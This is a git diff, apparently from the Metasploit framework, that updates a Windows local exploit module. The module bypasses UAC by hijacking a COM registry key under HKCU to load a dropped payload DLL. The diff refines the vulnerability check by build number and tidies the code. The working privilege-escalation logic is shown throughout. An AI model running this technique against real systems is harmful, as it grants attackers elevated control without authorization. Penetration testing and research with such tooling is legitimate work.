rapid7 · smcintyre-r7 · Mar 4, 2022 · Mar 3, 2022 · Mar 3, 2022
diff --git a/modules/exploits/windows/local/bypassuac_comhijack.rb b/modules/exploits/windows/local/bypassuac_comhijack.rb
@@ -6,13 +6,14 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Post::Windows::Priv
   include Post::Windows::Registry
   include Post::Windows::Runas
   include Exploit::FileDropper
 
-  CLSID_PATH = "HKCU\\Software\\Classes\\CLSID"
-  DEFAULT_VAL_NAME = '' # This maps to "(Default)"
+  CLSID_PATH = 'HKCU\\Software\\Classes\\CLSID'.freeze
+  DEFAULT_VAL_NAME = ''.freeze # This maps to "(Default)"
 
   def initialize(info = {})
     super(
@@ -51,6 +52,11 @@ def initialize(info = {})
           ['URL', 'https://github.com/FuzzySecurity/Defcon25/Defcon25_UAC-0day-All-Day_v1.2.pdf']
         ],
         'DisclosureDate' => '1900-01-01',
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -63,11 +69,26 @@ def initialize(info = {})
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows (7|8|10|2008|2012|2016)/ && is_uac_enabled?
-      Exploit::CheckCode::Appears
-    else
-      Exploit::CheckCode::Safe
+    vprint_status("System OS Detected: #{sysinfo['OS']}")
+    # return CheckCode::Safe('UAC is not enabled') unless is_uac_enabled?
+    if sysinfo['OS'] =~ /Windows (7|8|2008|2012)/
+      return CheckCode::Appears
+    end
+
+    if sysinfo['OS'] =~ /Windows (10|2016)/
+      sysinfo_value = sysinfo['OS']
+      build_num_arr = sysinfo_value.split('Build')
+      return CheckCode::Safe('Unable to determine build Number') if build_num_arr.length < 2
+
+      build_num = build_num_arr[1].to_i
+      vprint_status("Detected build number: #{build_num}")
+      if build_num < 18362
+        return CheckCode::Appears
+      else
+        return CheckCode::Safe
+      end
     end
+    return CheckCode::Safe
   end
 
   def exploit
@@ -100,7 +121,7 @@ def exploit
       return
     end
 
-    payload = generate_payload_dll({ :dll_exitprocess => true })
+    payload = generate_payload_dll({ dll_exitprocess: true })
     commspec = expand_path('%COMSPEC%')
     dll_name = expand_path("%TEMP%\\#{rand_text_alpha(8)}.dll")
     hijack = hijack_com(registry_view, dll_name)
@@ -115,7 +136,7 @@ def exploit
       write_file(dll_name, payload)
       register_file_for_cleanup(dll_name)
 
-      print_status("Executing high integrity process ...")
+      print_status("Executing high integrity process #{expand_path(hijack[:cmd_path])}")
       args = "/c #{expand_path(hijack[:cmd_path])}"
       args << " #{hijack[:cmd_args]}" if hijack[:cmd_args]
 
@@ -124,11 +145,11 @@ def exploit
       client.sys.process.execute(commspec, args, { 'Hidden' => true })
 
       # Wait a copule of seconds to give the payload a chance to fire before cleaning up
-      Rex::sleep(5)
+      Rex.sleep(5)
 
       handler(client)
     ensure
-      print_status("Cleaning up registry ...")
+      print_status('Cleaning up registry; this can take some time...')
       registry_deletekey(hijack[:root_key], registry_view)
     end
   end
@@ -187,10 +208,6 @@ def check_permissions!
     vprint_status('Checking admin status...')
     admin_group = is_in_admin_group?
 
-    unless check == Exploit::CheckCode::Appears
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
-    end
-
     unless is_in_admin_group?
       fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
     end
@@ -199,12 +216,10 @@ def check_permissions!
     if admin_group.nil?
       print_error('Either whoami is not there or failed to execute')
       print_error('Continuing under assumption you already checked...')
+    elsif admin_group
+      print_good('Part of Administrators group! Continuing...')
     else
-      if admin_group
-        print_good('Part of Administrators group! Continuing...')
-      else
-        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
-      end
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
     end
 
     if get_integrity_level == INTEGRITY_LEVEL_SID[:low]